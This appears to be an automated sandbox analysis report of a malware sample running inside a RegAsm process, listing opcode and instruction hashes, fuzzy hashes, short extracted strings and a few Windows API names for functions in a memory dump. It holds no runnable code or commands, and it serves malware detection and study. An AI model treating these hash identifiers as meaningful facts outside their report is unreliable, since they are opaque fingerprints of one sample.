                                                                                                                                                                                                                                                                                      • Opcode ID: d24d297a3dab3c78789d4ed2080329c0bd71d3cf4e8fd8e6a8c2d4e774b87a61
                                                                                                                                                                                                                                                                                      • Instruction ID: 6d744df0831a0ae87d166a5dfa0d5ba02f7ed62b28812e3988f6b6b2683779cd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d24d297a3dab3c78789d4ed2080329c0bd71d3cf4e8fd8e6a8c2d4e774b87a61
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0781C975604B00DFD7249F19D980A22B7F1FF0A712F108969E89A8BBA2C335F954CF58
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 4`[b$KJML$su$wy
                                                                                                                                                                                                                                                                                      • API String ID: 0-1697342906
                                                                                                                                                                                                                                                                                      • Opcode ID: 1b39f772b0cd9e0e53f854c38669cb4ec5e79b69e8ef8a2d46ba00d4a8cfb5c8
                                                                                                                                                                                                                                                                                      • Instruction ID: 4fbfb9e9f668add66dc1e9d5fa60ec3e0aac38d90ca323f0680c513d44b27eb4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b39f772b0cd9e0e53f854c38669cb4ec5e79b69e8ef8a2d46ba00d4a8cfb5c8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80E17DB4908340DFE7209F14D891BABB7F4EF85356F14092DF5858B3A2E7789980CB5A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 1")&$@DvF$_kQT$a[[d
                                                                                                                                                                                                                                                                                      • API String ID: 0-276304770
                                                                                                                                                                                                                                                                                      • Opcode ID: 120e7987c176392a5503b588ab93b9273890ba6732227fe43507c8885721f780
                                                                                                                                                                                                                                                                                      • Instruction ID: 6dc7b629671ab9bb9cb08738f0a238b837fe27ba764ad5bebf27ec5c13f65d95
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 120e7987c176392a5503b588ab93b9273890ba6732227fe43507c8885721f780
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC5147B440C3818FD302DF69849061BBFE2AB97344F184D5DE4E55B382C37A8809DB6B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 4J$J+*)$OO$VG
                                                                                                                                                                                                                                                                                      • API String ID: 0-160897490
                                                                                                                                                                                                                                                                                      • Opcode ID: 0f994e25e501778185bac6c0785b33e44ab021523602a15f7da29192aebbcbaf
                                                                                                                                                                                                                                                                                      • Instruction ID: 328a1af47a2cbcda32f09ba7d3aca5e1a1ab4d5314d2342d18e692254cc7d468
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f994e25e501778185bac6c0785b33e44ab021523602a15f7da29192aebbcbaf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C251BCB4A01225DFCB10DF54E980AAEBBB5FF55344F504689E854AF385E338D900CFA9
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 3?$~
                                                                                                                                                                                                                                                                                      • API String ID: 0-2864224099
                                                                                                                                                                                                                                                                                      • Opcode ID: bdea1c153e928969ab7d435eb39088234a6cee50814f337c8a0dab2c251f582e
                                                                                                                                                                                                                                                                                      • Instruction ID: 7d2f6163cdec74b1383ac20b987ba846dcfcdcbb979daab0bc71b975313c8841
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bdea1c153e928969ab7d435eb39088234a6cee50814f337c8a0dab2c251f582e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9532BDB55083409BC710DF28E98165FBBF5EF86349F04482EF585972A2E33ADD84CB5A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: hw$mo
                                                                                                                                                                                                                                                                                      • API String ID: 0-3445322867
                                                                                                                                                                                                                                                                                      • Opcode ID: 1d3bd81f5fbab551ec028db95edbd5784e21896ef91cd45555b2b311f7fc7ade
                                                                                                                                                                                                                                                                                      • Instruction ID: 2c023793c8b6ba90239ac5b1072886ca7af1bbc5c0087314c6e544a7a7f0a8eb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d3bd81f5fbab551ec028db95edbd5784e21896ef91cd45555b2b311f7fc7ade
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8D1EAB5D00299DFCF10CFD4E9816AEBFB1BF16304FA44419E895AB346D3389A19CB94
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 4`[b$KJML
                                                                                                                                                                                                                                                                                      • API String ID: 0-506811594
                                                                                                                                                                                                                                                                                      • Opcode ID: 3965a9e909609a832b83793623fb5513339fcc669f0fea92888a16a47f80b0d2
                                                                                                                                                                                                                                                                                      • Instruction ID: 453aa022502e00570b2feeef19282c051b43e8fc82a210c4284a9cfd8befd892
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3965a9e909609a832b83793623fb5513339fcc669f0fea92888a16a47f80b0d2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FC1E2756082609BD711AF14E841A2BB7F5EF56754F8A481EF8C597351E338EC00C76B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 4`[b$KJML
                                                                                                                                                                                                                                                                                      • API String ID: 0-506811594
                                                                                                                                                                                                                                                                                      • Opcode ID: 28f33c59363c89cce6be583904ca819f463f1177403f1c6653d9a346fa23229b
                                                                                                                                                                                                                                                                                      • Instruction ID: 552e9fe720deac7a424b0e2fde85f4fb790bad3bc2ea403101b232011b607cee
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28f33c59363c89cce6be583904ca819f463f1177403f1c6653d9a346fa23229b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C81E3B0A08300ABE310DF55D941B2FB7E5EF89706F14983DF585872A2D339D918CB6A
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(0044DB80,00000000,00000001,0044DB70), ref: 00426939
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 542301482-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3f9d0ef6bb7f92ca2c00d4605e3908b8465e3a54601ff2f0d0efc5ad61611f87
                                                                                                                                                                                                                                                                                      • Instruction ID: e648b978d5f4107b3f52ecc83fc291ac8fe06eaf414e599de5fb36c671636fec
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f9d0ef6bb7f92ca2c00d4605e3908b8465e3a54601ff2f0d0efc5ad61611f87
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F561D1B07002209BDB209F24EC92B7733B4EF85758F45855AF985CB390E779E841C76A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: WC
                                                                                                                                                                                                                                                                                      • API String ID: 0-1542900038
                                                                                                                                                                                                                                                                                      • Opcode ID: 7ea51c982263e72917ef85fc017a2478efbb78a1ac35f58a04ed1b8e1a4b7e45
                                                                                                                                                                                                                                                                                      • Instruction ID: 8bc2f7339cf9eda94b66e028cfa5c6bcce63b0efe556a6af08bc850028c35da3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ea51c982263e72917ef85fc017a2478efbb78a1ac35f58a04ed1b8e1a4b7e45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05E1BEB19083519BD711DF24D4807AFBBF4ABC6708F04082EF69597291E779DC84CB9A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 4`[b
                                                                                                                                                                                                                                                                                      • API String ID: 0-3962175265
                                                                                                                                                                                                                                                                                      • Opcode ID: 5f50807d90a6607f329ff65f59de1c7a238bde586e32748caac90642ffae9e55
                                                                                                                                                                                                                                                                                      • Instruction ID: 9ac73a957ebb8b157aeaeaab9356c5b3d3dea1e4aed4da603f484518433207a0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f50807d90a6607f329ff65f59de1c7a238bde586e32748caac90642ffae9e55
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8716D72E187118BC718CF2CE85163AB3E2ABC9305F59867DD8969B382DB34EC11C795
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: KJML
                                                                                                                                                                                                                                                                                      • API String ID: 0-719402181
                                                                                                                                                                                                                                                                                      • Opcode ID: abbf606ee821c2ef6cb42c0acd2235df7f01f17b1c02991b6e25b292996c32d4
                                                                                                                                                                                                                                                                                      • Instruction ID: 321bca01bf4d63305039b4ccc0274116f758412f9d2bd6ff495cf545cb310986
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abbf606ee821c2ef6cb42c0acd2235df7f01f17b1c02991b6e25b292996c32d4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A61DE7060C341ABE714DF55C880B2BBBE2EFC5315F19891EE0D587292D735E811CB5A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: KJML
                                                                                                                                                                                                                                                                                      • API String ID: 0-719402181
                                                                                                                                                                                                                                                                                      • Opcode ID: 0a77ff45556653e3b4c1a3899d2b4813c77c39a99d7ba853b5d566c61081b872
                                                                                                                                                                                                                                                                                      • Instruction ID: 7b795fcc7aeb042f1e61fb398c5b5519468544f63ff3ce0d3a544fd1747eeb8e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a77ff45556653e3b4c1a3899d2b4813c77c39a99d7ba853b5d566c61081b872
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49518274608340ABE714EF15D940A2BFBE5EF95B0AF14882EE5C997352D339DD10CB2A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                                                      • Opcode ID: 3eb77cbc6a0e691b74808586691ed2d68da8c847ef911fe556f862d64f501eb1
                                                                                                                                                                                                                                                                                      • Instruction ID: f8c2b13b8ecb891cb5da105a2a440181923f4a5169d172d24a6918b7b4f6b34a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3eb77cbc6a0e691b74808586691ed2d68da8c847ef911fe556f862d64f501eb1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3641DCB26043009FE7109F58DC82B2BB7E5EF85318F14882EF585CB2A1E339D904DB5A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: lD
                                                                                                                                                                                                                                                                                      • API String ID: 0-1556624830
                                                                                                                                                                                                                                                                                      • Opcode ID: 686e58ce95875a2b59766bc4eba3908485db94c69eb4bdbbc4362e5ae0bf59c0
                                                                                                                                                                                                                                                                                      • Instruction ID: a57129c04997aa2d21f272649705d5a842ecd08611bfacc255b2512c31cadb20
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 686e58ce95875a2b59766bc4eba3908485db94c69eb4bdbbc4362e5ae0bf59c0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C3122B4408341AAE304CF14D29062BBBF1AF8AB49F404D5DF4C86B251D378CA49DBAB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: KJML
                                                                                                                                                                                                                                                                                      • API String ID: 0-719402181
                                                                                                                                                                                                                                                                                      • Opcode ID: caafa29e1746402a3bc1dd2012d9dea04e5d9d23014523a00b58d426ec84dcfb
                                                                                                                                                                                                                                                                                      • Instruction ID: 402b1d6f3ce52be78c6298c200da5eed5b4be55f798fd25b12f030fbaebe26b0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: caafa29e1746402a3bc1dd2012d9dea04e5d9d23014523a00b58d426ec84dcfb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C315870508340ABE300DF19D584B1FFBE6AF95B19F54C82EE4C88B252C73AD905CB5A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                                                      • Opcode ID: 6d8bec603013514a69dbddf2149b176519f1f37eed4cf727b6368855c93d3b71
                                                                                                                                                                                                                                                                                      • Instruction ID: 80f8444034b813ff2992da189270fd94492570cbba64a4862774ca5c3b48c153
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8bec603013514a69dbddf2149b176519f1f37eed4cf727b6368855c93d3b71
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6319A70909300ABE310DF18D980A2FBBF5FF8A315F14892DE5C997251D339D8248B5B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: a677f506fed11e576eeeccc96a34b091fd9446c31473116387a0a1f4fb0f5f32
                                                                                                                                                                                                                                                                                      • Instruction ID: 7977b26edaf41aec82e17c4ce4fdc74c54d61353d844f7cb564dc2529763ad48
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a677f506fed11e576eeeccc96a34b091fd9446c31473116387a0a1f4fb0f5f32
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9F1BB712087418FC728CF29C881A2BFBE1EF95304F048D2EE4DA57791E275E954CB9A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: b0e6b5a0e70733c3f49c0f3c7291c7aec217be71e73eb38dbc257a8b4ebbae13
                                                                                                                                                                                                                                                                                      • Instruction ID: 5a72c17d9f92149a653973fd25867525cffcaad2eaa002cf593b5cec2a382abe
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0e6b5a0e70733c3f49c0f3c7291c7aec217be71e73eb38dbc257a8b4ebbae13
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CED1AEB0E0122ADBDB10DF94DC81AAFBBB0FF05314F54494DE851AB382E7399911CBA5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 756599a7430fbac490de6ace6bf1a5314dc6e4a959f5bcfb9eeb76c45a43a6ee
                                                                                                                                                                                                                                                                                      • Instruction ID: 9245cc31d22152a3189c5eda298879a30eaadbd09e698be487a8fe541ce99eae
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 756599a7430fbac490de6ace6bf1a5314dc6e4a959f5bcfb9eeb76c45a43a6ee
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13B124707083158BD310DF25E88166BB7E1EF95318F98892EE6C587392E33DD845CB9A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 1de28fc3d00429aa9ddc193e46ba1aa38a210fd127dcc06e5f417e5f2ed67c0c
                                                                                                                                                                                                                                                                                      • Instruction ID: b34f00d3f842626b3ae1a85e223359d890d5ed0cdf4910985b100088112adfc6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1de28fc3d00429aa9ddc193e46ba1aa38a210fd127dcc06e5f417e5f2ed67c0c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5C14576A08312CBC714DF28D8416AA73F2EFC5319F09493EE48597391EB38D951CB4A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: c94485f3706837459e2f85b3763eff16130dbb7f6703b2af40194572de4fc06b
                                                                                                                                                                                                                                                                                      • Instruction ID: b1286d80b81041b8a41ccbef3c70befb1b0f5f3c1007badf6fcfebc64c391331
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c94485f3706837459e2f85b3763eff16130dbb7f6703b2af40194572de4fc06b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA71AE356483019BE710AF58D880A2FB7A2EF85744F16882DE5858B361D735EC25CB9B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 652d9b0a42a5b038a95ada0691ac80fadabc44ff43e7769efa5cc7626c298bce
                                                                                                                                                                                                                                                                                      • Instruction ID: b805dea12300ae11e9995d21aba375839ff215681db5c216752d4c3e259c7ef2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 652d9b0a42a5b038a95ada0691ac80fadabc44ff43e7769efa5cc7626c298bce
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3781BF746483419BE724DF28C880A2BB7E1FF89744F06892EE586D7351E734EC60CB5A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: b9a41622f651dc956c18ffb0511dda4e8d844ca5fae39e86291fa2d83d9061f0
                                                                                                                                                                                                                                                                                      • Instruction ID: 4d55fd542f1f49bd083f9e4d29930bda77da598b1ecf5f90d1e2c9128a0347ca
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9a41622f651dc956c18ffb0511dda4e8d844ca5fae39e86291fa2d83d9061f0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FB156F09003449FCB20CF95DA81B6BBBB5FB09740FA05959E845AF256D334E901CFAA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 50edbc0de27a0ad8a0233c49cebb7c7470d9a18cbae4e1e24011e1cf0073526a
                                                                                                                                                                                                                                                                                      • Instruction ID: 1b5e25962bc49ab95dda85a38233ac23f42cc7d86183b52185758c38fc026a5d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50edbc0de27a0ad8a0233c49cebb7c7470d9a18cbae4e1e24011e1cf0073526a
